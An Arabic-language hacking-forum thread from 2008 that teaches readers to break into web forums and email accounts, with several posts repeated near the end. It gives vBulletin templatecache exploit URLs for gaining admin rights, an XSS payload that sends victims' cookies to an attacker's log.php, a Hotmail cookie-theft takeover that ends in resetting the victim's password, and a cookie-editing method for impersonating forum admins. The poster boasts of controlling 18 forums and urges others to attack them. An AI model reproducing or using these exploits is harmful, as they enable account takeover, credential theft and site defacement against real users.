اقوى ثغرات عالم اختراق المنتديات والمواقع !! - خاص بـ شبكة الافلام -- حصري جدا

gasan · #1 (**permalink**) 02-03-2008, 10:37 PM

السلام عليكم

الموضوع :
افضل واسرع الطرق لاختراق المنتديات والمواقع ( مجربة 100/100)

كاتب الموضوع : gasan
المصدر : قسم الهكر والاختراق ( منتديات شبكة الافلام)

--------
الدرس الاول : ثغرات التحويل ..
هذة الدرس بسيط جدا
وتنفيذة سهل جدا ومن الممكن تنفذيه من قبل الكل
--------

نبدأ !!

طبعا ثغرات التحويل هي من اسرع وافضل الطرق لتغير انديكس منتدى معين الى صفحة اخرى

وبالتالي فانك تقوم بـ

تعطيل دخول المنتدى
تعطيل دخول اي قسم او اي موضوع
تعطيل دخول لوحة التحكم
تربك صاحب المنتدى ومن الممكن ان يتخذ خطوات غبية .. او على الاقل تجعله يخسر الستايل باكمله ( وذلك باعادة تنصيب المنتدى عن طريق ترقيته)

---- ---- ---
ثغرات التحويل !!
شرح !!
ثغرات التحويل هي عبارة عن مجموعة اكواد من الممكن ان تكون متاحة في منتدى معين تمكن من استغلالها في :

هاك الاهداء
هاك صندوق المحادثات
الاحصائيات
عنوان في موضوع معين
كلمات في رد معين

---- ---- ---
كيف يتم استغلالها ؟

تستطيع كتابة موضوع معين !!

تكتب عنوان الموضوع !! ( الكود نفسو , لا تنسى وضع لينك موقع معين او انديكس للكود)

عن طريق وضع الكود في الاهدائات
صندوق المحادثات ( النسخ القديمة )
اي هاك يجعلك تكتب شيئ معين

---- ---- ---
من اي احصل على هذة الاكواد ؟

الاكواد مرفقة في الموضوع من الاسفل !! حمل وجرب

---- ---- ---
كيف يتم اغلاق هذة الثغرات ؟
تسطيع اغلاق هذة الثغرة عن طريق الكلمات الممنوعة
وذلك بحذف بعض الكلمات
وهناك قائمة اخرى مرفقة في الموضوع تحوي بعض هذة الكلمات !!
---- ---- ---

يتبع ... ثغرات اخرى >>>>

gasan · 02-03-2008, 10:59 PM

ثغرة

مكتشف التغرة : العقرب الأسود

خطورة التغرة خطيرة جدا جدا

هذا التغرة تجعلك مدير المنتدى أو مشرف عام والـخ

==========
شرح التغرة
==========
أولا نقوم بتسجيل في المنتدى

نذهب على الرابط التالي

http://^_^.com/vbulletin/register.php

بعد ما نقوم بالتسجيل

نضيف الكود التالي بعد عنوان الموقع

index.php?action=faq&templatecache[faq]=hello+world

ليكون عنوان الموقع بلشكل التالي

http://^_^.com/vbulletin/index.php?action=faq&templatecachefaq]=hello+world

hello"world=غيرها الي اسم أدمن المنتدى

اذا ظهر اسم مستخدمك مرتين أو رجعك للصفحة المنتدى الرئيسية يعني أن المنتدى مصاب

الان نسوي الكود التالي

member.php?action=login&username=myuser&password=mypass&url=hello"world

ليكون اسم المنتدى بلشكل التالي

http://^_^.com/vbulletin/member.php?action=login&username=myuser&password=m ypass&url=hello"world

ملاحظة غير المتغير التالي

بالترتيب

مكان

[center]username= اسم المستخدم لي سجلت بة[/center]

[center]password = كلمة السر حقك التي سجلت بها العضوية[/center]

[hello"world= غيرها الى اسم أدمن المنتدى

الان بيقول لك هذا العضو

اقتباس:
هذا العضو غير مسجل لدينا ولذا فليس لديه ملف شخصي لمشاهدته
الان نضيف الكود التالي

search.php?action=simplesearch&query=searchthis&templatecache[standardredirect]=hello"world

hello"world=غيرها الي اسم أدمن المنتدى

بيكون رابط المنتدى بلشكل التالي

http://^_^.com/vbulletin/search.php?action=simplesearch&query=searchthis&te mplatecache[standardredirect]=hello"world

hello"world=غيرها الي اسم أدمن المنتدى

الان بيفتح معاك محرك البحث وبتحصل كلمة

searchthis

ومـــبرووك عليك الاختراق

يكمل،، >>>>

gasan · 02-04-2008, 06:15 PM

بسم الله الرحمن الرحيم

اقوى الثعرات
لن تجد ثغرة اقوى او ثغرة مضمونة اكثر منها !!
ثغرة قديمة لكنها لحد الان تعمل @@
لانك لن تخترق منتدى @@
بل ستحصل على معلومات من جهاز الضهية ( الادمن)

- - - - - -

أحب ان استعرض تجربتي مع الثغرة !!
طبعا هالثرة هي ثغرة مكتشفها مهندس اتصالات الماني ( عبقري جدا )

ان تمكنت من فهمها واستعمالها ستتمكن من اختراق اي موقع او اي منتدى او اي ايميل تريده بسهولة !!!!!
المسالة بسيطة جدا
1) صفحة ملغومة @
2) بعد دخول الضحية على الصفحة -- فانها ترسل على ايميلك الكويكز الازم لدخول الايميل او العضوية او او او ...
3) ارجو عدم استخدامها ضد المسلمين
4 ) ثغرة روعة بجد !!!!!

من اجمل الثغرات الي جربتها !!

-----------------------------

بسم الله نبدأ الشرح:-

طبعا ثغره الهوتميل اقوى ثغره التي هزت شركه الـ MSN
وقللت من حمايتها وانسرقت اغلب اميلات الشباب الموجوده بالنت
واول ثغره نزلت عام 2005 ... الي يجي ويقول عارفها من زمان
اقوله الثغره كانت برايفت بس انتشرت وهالثغره الي بشرحها
كانت برايفت بس انشرحت وهذي انا شرحتها مره ثانيه بمنتديات مياسه

اول شئ بعطيكم معلومه عن ثغرات الــ Xss

طبعا الـ Xss او الCross Site ******ing ثغرات حلوه جدا
وهي لها صله بالــ C o o k i e s ومن خلال هذا الـ C o o k i e s
تقدر انك تستفيد من معلومات الكوكيز نفسه

واحد يجي يسألني طيب يا كويتي صخر كيف نستفيد؟

انا اقولك كيف تستفيد.... ^^

طبعا الكوكيز موجود بكل جهاز وبكل منتدى تسجل فيه الكوكيز يجيك
تلقائي بجهازك علشان اذا دشيت المنتدى مره ثانيه يتسجل تلقائي
تلقى نفسك متسجل خالص بس تدش تشارك ليش يصير هالشئ؟

لان الكوكيز دش جهازك وانحفظ وطبعا مو خطر ان يدش جهازك
وله فايده على المنتدى نفسه ان يحصد اكثر عدد من الاجهزه

انا شرحت من كم فتره ثغره الفلاش تبع منتديات الـ vBulletin
ان يوصلك الكوكيز على اميلك ومن ثم تاخذ برنامج كوكيز اديتور
وتغير الـ LastVisit و Userid و Password
وتسوي حفظ وتدش المنتدى بأسم الادمن هذي الثغره تسمى Xss
ليش؟ لان يوصلك الكوكيز واي ثغره تتعلق بالكوكيز اسمها Xss

الان احنا عرفنا نبذه عن ثغره الـ Xss

طيب كيف مثلا يا كويتي صخر اعطيني شرح مبسط لثغرة xss .. ؟

مثلا عندنا ثغرة xss بمنتدى Invision Power Board

مثلا [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

الحين الxss بالمنتدى

http://xxx.com/forums/index.php?act=idx='>xss

الحين بمكان كلمه xss نضيف كود خبيث يعرض لنا الكوكيز و هو

<******>java******:alert(document.****** )</******>

بصير كالتالي :

http://xxx.com/forums/index.php?act=idx=<******>java******:alert(documen t.co o k ie )</******>

الأن بعد ما نكتب الرابط بالمتصفح راح تظهر لنا نافذة Microsoft Internet Exploler و داخلها معلومات الكوكيز بجهازك تبع المنتدى ..

طيب جميل جدا الأن كل شئ .. لكن لسة ما وصلنا كيف راح يسرق الهكر الكوكيز من جهازي

الحين انا الى دخلت على الرابط و ظهر لي الكوكيز في جهازي ما ظهرت للهكر !!..

فعلا الكوكيز ظهر على جهازك!! مثلا الهكر يبي يشوف هالكوكيز عنده شنو يسوي؟

راح يستخدم شئ اسمه الـLog و يربطه مع الثغرة ..

ايش هو الLog ؟

الوج هذا عبارة عن ملف مكتوب بلغة الphp يقوم بتسجيل الكوكيز الى توصله في ملف txt او يرسلها على الأيميل..

الحين لما يجي الهكر يربط الثغرة بملف الوج و انت تدخل على الرابط اول لما تدخل على الرابط راح ترسل الكوكيز لملف الlog و يحصل عليها الهكر .. ( مثل ما شرحت بثغره الفلاش )

نشوف مثال لربط ملف الوج بالثغرة .. راح نستبدل الكود الخبيث

<******>java******:alert(document.****** )</******>

و الرابط يكون :

http://xxx.com/forums/index.php?act=idx=<******>********.href="http://www.xxx.com/log.php?id="+escape(document.******</******>

http://www.xxx.com/log.php = رابط ملف الوج الى راح يرسل له الكوكيز

طيب الحين نفرض الهكريبي يسرق الكوكيز من جهازك راح يرسلك هذا الرابط اول لما تدخل عليه راح ترسل الكوكيز إلي راح يسجلها في ملف txt على الموقع او يرسلها علطول على الأيميل ..

الحين جذي عرفنا تطبيق بسيط لثغرة xss و اصبح لدينا خلفية عنها و فهمنا كيف تتم ..

---------------------------

الان بعد هالمقدمه الطويله ندش بصلب الموضوع

يوجد بالهوتميل ثغره خطيره جدا جدا من نوع Xss
التي تؤدي الى سرقه الاميل بالكوكيز بدون برامج....

بالبداية انا راح اشرح الثغرة ليس لهدف استغلالها و السرقه بها و لكن لعرض مدى خطورتها على كل واحد
و كمان نرى هذي الأيام انتشار عمليات سرقه ايميلات ناس كثير بدون استقابل اي برامج او باتشات

.::: بسم اللًة نبداء الشرح ::..

بالنسبه لتطبيق الثغره راح نحتاج 4 ملفات...

1- ملف الــ Log.php
2- ملف js
3- ملف الــ index.htm
4: كود استغلال الثغرة ..

ِشوف الصوره:-

الحين راح يتم التعديل على الملفات
بالبدايه نفتح ملف الــ index.php بمفكره
شوف الصوره:-

ونعدل على الي داخله شوف الصوره وياي :-

بدال الـ xxx حط اسم موقعك علشان يكون التعديل على موقعك

والحين نفتح ملف الــ js

ونعدل عليه كما في الصوره الحين:-

والحين نفتح الــ FTP على موقعك وتنقل الملفات عليها

وتنقل ملفات الثغره كامله كما هو مشورح بالصوره
واحسن شئ انك ترفعه مع المجلد كامل وتسميه اي شئ وتمويه للضحيه سميه
مثل اسم المنتدى يعني مثال :- vb
علشان ما يشك الضحيه ويقول ان الرابط صحيح لمنتدى فاهمين علي؟

وبعدين نعطي المجلد الي فيه الثغره تصريح رقم 777
وطريقه اعطاء التصاريح بالصوره شوف:-

وبعدين ترسل رساله من اميلك على اميل الي تبي تسرقه
في وقت دخول الي دزيتله رساله راح يشيك على الرسايل ويشوف الرساله مالتك
يفتحها اول ما يفتحها راح تشوف مجلد الثغره زاد ملف ثاني اسمه
majed.htm هذا المجلد اهو الي فيه الكوكيز
يعني يصير الرابط مال الملف الي فيه الكوكيز بالطريقه هذي
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

حيث ان xxx
هو اسم الموقع تبعك وراح تشوف الكوكيز كما في الصوره التاليه:-

انسخ الكوكيز كاااامل وتأكد ان الكوكيز كامل
وبعدين افتح برنامج اسمه
Proxomitron

وهذي ايقونته:-

تفتحه البرنامج وتروح على قائمه الهيدر
شوف الصوره وياي:-

وبعدين راح نضغط على قائمه نيو شوف الصوره:-

وبعدين راح يفتحلك مربع ثاني

مثل ما تشوف راح تحط الفراغ الاول مثل ماهو مكتوب
والفراغ الثاني تتركه فاضي طبعا
والفراغ الثالث تحط فيه علامه النجمه "*"

والفراغ الرابط طبعا الكوكيز كاااامل وتأكد ان كااامل وانسخه والصفه بالفراغ الاخير
وبعدين اضغط اوكي

وبعدين راح تشوف كلمه كوكيز اشل على الصح الي على Out
وبعدين اضغط على Apply
واضغط على Ok

والحين خلاص اخر خطوه تسويها والي اهي الدخول على رابط الاستغلال
والي اهو:-

[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

وراح تشوف الانبوكس تبع الاميل الي تبي تسرقه قدامك
وشوف هذا تطبيق للثغره مالت الهوتميل

والحين خلاص تقدر تسوي اي شئ وتغير الباسوورد
تدخل على موقع الهوتميل الي اهو
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
وتضغط على نسيان الباسوورد ولكن ليس على الاميل البديل
على الاميل نفسه وراح توصلك رساله من الشركه وتفغط على الرابط الاول
وتغير الباسوورد
وألف مبرووووووووووووك

نكمل درس اخر >>

gasan · 02-04-2008, 06:34 PM

بسم الله الرحمن الرحيم

الموضوع مكتوب من عام 2004 وكان محفوظ عندي في الهادرسك الخارجي قلت
خلني انقله لاخواني جميع الحقوق محفوظه للدارك انجل ماعدلت الا الرابط لانه كان
معطل بعد الشرح اتمنى منكم اختراق كل ثغره المنتديات اللى شرحتها حنا:::::::
وعندي حوالى 18 منتدى تحت يدي شدو حيلكم............ نبدا على بركه الله

ماهي وظيفه الكوكيز اديتور؟

وظيفه البرنامج: فك الباسورد المشفر عن طريق خداع الكويكيز فعند تسجيلك في اي موقع بيتحمل عندك الكويكيز
لتسهيل دخولك مره اخري فتلاحظ عند تسجيلك مثلا في المنتدي هتلاقي بعد كتابه اسم دخولك والباسورد خيار اسفل
يقول حفظ معلومات الدخول لو علمه عليه بيتم تحميل الكويكيز في جهازك حيث عند رجوعك مره اخري تلاحظ
دخولك دون طلب اليوزر والباس ولكن عندما تعمل تسجيل خروج يتم مسح جميع الكويكيز ويطلب منك اليوزر والباس
عند العوده ولو هنتكلم عن الكويكيز هيحتاج موضوع كامل ولكن اظن اني وضحت الفكره
فكره عمل البرنامج: هي استبدال بيانات تسجيلك من(باسورد مشفر+رقم العضويه او اليوزر) ببيانات الادمن
ويقوم البرنامج بخداع الكويكيز وبعدها تقوم بالتسجيل راح تلاقي نفسك الادمن
شرح البرنامج: انا هشرح ادوات البرنامج الخاصه في الاختراق
بعد تصتيب البرنامج بيظهر لنا ايكونه تشغيل البرنامج علي سطح المكتب كما بالصوره

بعد فتح البرنامج يظهر لنا كما بالصوره

بعدها نضغط علي Search (بحث) كما بالصوره

ونكتب بداخلها عنوان الموقع او المنتدي المراد اختراقه .وطبعا هتكون انت مسجل فيه الاول.....
بعدها هيظهر لك معلومات تسجيلك وانا جربت هنا علي نفسي كما بالصوره وهنلاحظ امام كلمه bbuserid
يظهر رقم العضويه وهو هنا بالنسبه لي4

وامام كلمه bbpassword يكون الباسورد حقك ويكون طبعا مشفر كما بالصوره

وبعد الضغط علي باسوردك يظهر لك كما بالصوره التاليه

بدايه الشغل من هنا :
==========
اولا: لازم تكون عارف رقم عضويه الادمن وفي العاده تكون 1
فتقوم بتغير رقم عضويتك برقم عضويه الادمن يعني مثلا بتغير من رقم 4 وهي رقم عضويتي الي رقم عضويه الادمن
ولتكن مثلا 1 علي حسب رقم عضويه الادمن اتبع كما بالصور

ولا تنسي بعد تغير المعلومات تضغط علي Save حفظ
وخلاص..
الخلاصه:
احنا حصلنا علي الباسورد المشفر لدي الادمن
نقوم بوضعه بدلا من الباسورد حقنا
وكذلك رقم العضويه
بعد كده حفظ
بعد كده يستحسن نضع المنتدي المراد اختراقه في الصفحه الرئيسيه للمتصفح عندنا
وبعد الانتهاء تقوم بغلق المنتدي وليس تسجيل خروج ..فقط غلقه من علامه X
وبعدها غلق البرنامج
وبعدها افتح الصفحه الرئيسيه لك وهي طبعا هتكون الهدف هتلاقي نفسك عمله تسجيل دخول بلادمن
تدخل بقي وتغير الاميل وتعمل تسجيل خروج وتدخل تطلب الباسورد راج يجي لك علي ايملك
والف مبروك عليك

حمل البرنامج من هنا
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

ابحث عن البرنامج هنا لانه ممنوع كتابه كلمه كوكيز في المنتدى

كاتب الموضوع ::::::::::::
(( Dark angeL ))
تنسيق الموضوع::::::::
صـــــــــــــقر غامد

- - - - --

في الرد التالي سوف اعرض تجربة مع الثغرة !!

gasan · 02-04-2008, 06:42 PM

طيب ماتحسون ياشباب ان دارك انجل بعد احترامي له طول الكلام شوف ياعسل انت

دخل المنتدى الاسم والباس so9or اللى باحط رابطه تحت وافتحه بعدها افتح البرنامج بتلقى موقعك من

ضمن المواقع اللى حفظت الكوكيز حقو غير الباس المشفر حقك بباس الادمن ورقم

العضويه غيرها من رقمي الى رقم الادمن اللى هو 1 قفل صفحه المنتدى اللى فيها

الثغره لا تسجل خروج خل رابط المنتدى الصفحه الرئيسه للمتصفح اي العنوان الرئيسي للمنتدى زي هيك so9or.com/fourm ادخل على رابط المنتدى من جديد تلقى نفسك

ادمن شوف ياشباب الصوره قدامكم وانا مسيطر على لوحه تحكم منتدى بس انا

ماحب الاختراقات

شوف بعد خداع الكوكيز اصبحت الادمن ..

matrix-007 · 02-08-2008, 11:31 PM

جميل جدا
مشكووووور

ambsh · 02-13-2008, 08:15 AM

ادرك بيسسس جدااا

02-03-2008, 10:59 PM	رقم المشاركة : [2 (permalink)]
gasan Administrator	ثغرة مكتشف التغرة : العقرب الأسود خطورة التغرة خطيرة جدا جدا هذا التغرة تجعلك مدير المنتدى أو مشرف عام والـخ ========== شرح التغرة ========== أولا نقوم بتسجيل في المنتدى نذهب على الرابط التالي http://^_^.com/vbulletin/register.php بعد ما نقوم بالتسجيل نضيف الكود التالي بعد عنوان الموقع index.php?action=faq&templatecache[faq]=hello+world ليكون عنوان الموقع بلشكل التالي http://^_^.com/vbulletin/index.php?action=faq&templatecachefaq]=hello+world hello"world=غيرها الي اسم أدمن المنتدى اذا ظهر اسم مستخدمك مرتين أو رجعك للصفحة المنتدى الرئيسية يعني أن المنتدى مصاب الان نسوي الكود التالي member.php?action=login&username=myuser&password=mypass&url=hello"world ليكون اسم المنتدى بلشكل التالي http://^_^.com/vbulletin/member.php?action=login&username=myuser&password=m ypass&url=hello"world ملاحظة غير المتغير التالي بالترتيب مكان [center]username= اسم المستخدم لي سجلت بة[/center] [center]password = كلمة السر حقك التي سجلت بها العضوية[/center] [hello"world= غيرها الى اسم أدمن المنتدى الان بيقول لك هذا العضو اقتباس: هذا العضو غير مسجل لدينا ولذا فليس لديه ملف شخصي لمشاهدته الان نضيف الكود التالي search.php?action=simplesearch&query=searchthis&templatecache[standardredirect]=hello"world hello"world=غيرها الي اسم أدمن المنتدى بيكون رابط المنتدى بلشكل التالي http://^_^.com/vbulletin/search.php?action=simplesearch&query=searchthis&te mplatecache[standardredirect]=hello"world hello"world=غيرها الي اسم أدمن المنتدى الان بيفتح معاك محرك البحث وبتحصل كلمة searchthis ومـــبرووك عليك الاختراق يكمل،، >>>>
gasan Administrator	التوقيع: .

02-04-2008, 06:34 PM	رقم المشاركة : [4 (permalink)]
gasan Administrator	بسم الله الرحمن الرحيم الموضوع مكتوب من عام 2004 وكان محفوظ عندي في الهادرسك الخارجي قلت خلني انقله لاخواني جميع الحقوق محفوظه للدارك انجل ماعدلت الا الرابط لانه كان معطل بعد الشرح اتمنى منكم اختراق كل ثغره المنتديات اللى شرحتها حنا::::::: وعندي حوالى 18 منتدى تحت يدي شدو حيلكم............ نبدا على بركه الله ماهي وظيفه الكوكيز اديتور؟ وظيفه البرنامج: فك الباسورد المشفر عن طريق خداع الكويكيز فعند تسجيلك في اي موقع بيتحمل عندك الكويكيز لتسهيل دخولك مره اخري فتلاحظ عند تسجيلك مثلا في المنتدي هتلاقي بعد كتابه اسم دخولك والباسورد خيار اسفل يقول حفظ معلومات الدخول لو علمه عليه بيتم تحميل الكويكيز في جهازك حيث عند رجوعك مره اخري تلاحظ دخولك دون طلب اليوزر والباس ولكن عندما تعمل تسجيل خروج يتم مسح جميع الكويكيز ويطلب منك اليوزر والباس عند العوده ولو هنتكلم عن الكويكيز هيحتاج موضوع كامل ولكن اظن اني وضحت الفكره فكره عمل البرنامج: هي استبدال بيانات تسجيلك من(باسورد مشفر+رقم العضويه او اليوزر) ببيانات الادمن ويقوم البرنامج بخداع الكويكيز وبعدها تقوم بالتسجيل راح تلاقي نفسك الادمن شرح البرنامج: انا هشرح ادوات البرنامج الخاصه في الاختراق بعد تصتيب البرنامج بيظهر لنا ايكونه تشغيل البرنامج علي سطح المكتب كما بالصوره بعد فتح البرنامج يظهر لنا كما بالصوره بعدها نضغط علي Search (بحث) كما بالصوره ونكتب بداخلها عنوان الموقع او المنتدي المراد اختراقه .وطبعا هتكون انت مسجل فيه الاول..... بعدها هيظهر لك معلومات تسجيلك وانا جربت هنا علي نفسي كما بالصوره وهنلاحظ امام كلمه bbuserid يظهر رقم العضويه وهو هنا بالنسبه لي4 وامام كلمه bbpassword يكون الباسورد حقك ويكون طبعا مشفر كما بالصوره وبعد الضغط علي باسوردك يظهر لك كما بالصوره التاليه بدايه الشغل من هنا : ========== اولا: لازم تكون عارف رقم عضويه الادمن وفي العاده تكون 1 فتقوم بتغير رقم عضويتك برقم عضويه الادمن يعني مثلا بتغير من رقم 4 وهي رقم عضويتي الي رقم عضويه الادمن ولتكن مثلا 1 علي حسب رقم عضويه الادمن اتبع كما بالصور ولا تنسي بعد تغير المعلومات تضغط علي Save حفظ وخلاص.. الخلاصه: احنا حصلنا علي الباسورد المشفر لدي الادمن نقوم بوضعه بدلا من الباسورد حقنا وكذلك رقم العضويه بعد كده حفظ بعد كده يستحسن نضع المنتدي المراد اختراقه في الصفحه الرئيسيه للمتصفح عندنا وبعد الانتهاء تقوم بغلق المنتدي وليس تسجيل خروج ..فقط غلقه من علامه X وبعدها غلق البرنامج وبعدها افتح الصفحه الرئيسيه لك وهي طبعا هتكون الهدف هتلاقي نفسك عمله تسجيل دخول بلادمن تدخل بقي وتغير الاميل وتعمل تسجيل خروج وتدخل تطلب الباسورد راج يجي لك علي ايملك والف مبروك عليك حمل البرنامج من هنا [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] ابحث عن البرنامج هنا لانه ممنوع كتابه كلمه كوكيز في المنتدى كاتب الموضوع :::::::::::: (( Dark angeL )) تنسيق الموضوع:::::::: صـــــــــــــقر غامد - - - - -- في الرد التالي سوف اعرض تجربة مع الثغرة !!
gasan Administrator	التوقيع: .

02-04-2008, 06:42 PM	رقم المشاركة : [5 (permalink)]
gasan Administrator	طيب ماتحسون ياشباب ان دارك انجل بعد احترامي له طول الكلام شوف ياعسل انت دخل المنتدى الاسم والباس so9or اللى باحط رابطه تحت وافتحه بعدها افتح البرنامج بتلقى موقعك من ضمن المواقع اللى حفظت الكوكيز حقو غير الباس المشفر حقك بباس الادمن ورقم العضويه غيرها من رقمي الى رقم الادمن اللى هو 1 قفل صفحه المنتدى اللى فيها الثغره لا تسجل خروج خل رابط المنتدى الصفحه الرئيسه للمتصفح اي العنوان الرئيسي للمنتدى زي هيك so9or.com/fourm ادخل على رابط المنتدى من جديد تلقى نفسك ادمن شوف ياشباب الصوره قدامكم وانا مسيطر على لوحه تحكم منتدى بس انا ماحب الاختراقات شوف بعد خداع الكوكيز اصبحت الادمن ..
gasan Administrator	التوقيع: .

02-08-2008, 11:31 PM	رقم المشاركة : [6 (permalink)]
matrix-007 عضو نشيط	جميل جدا مشكووووور
matrix-007 عضو نشيط

02-13-2008, 08:15 AM	رقم المشاركة : [7 (permalink)]
ambsh عضو جديد	ادرك بيسسس جدااا
ambsh عضو جديد

أدوات الموضوع	إبحث في الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق	إبحث في الموضوع: البحث المتقدم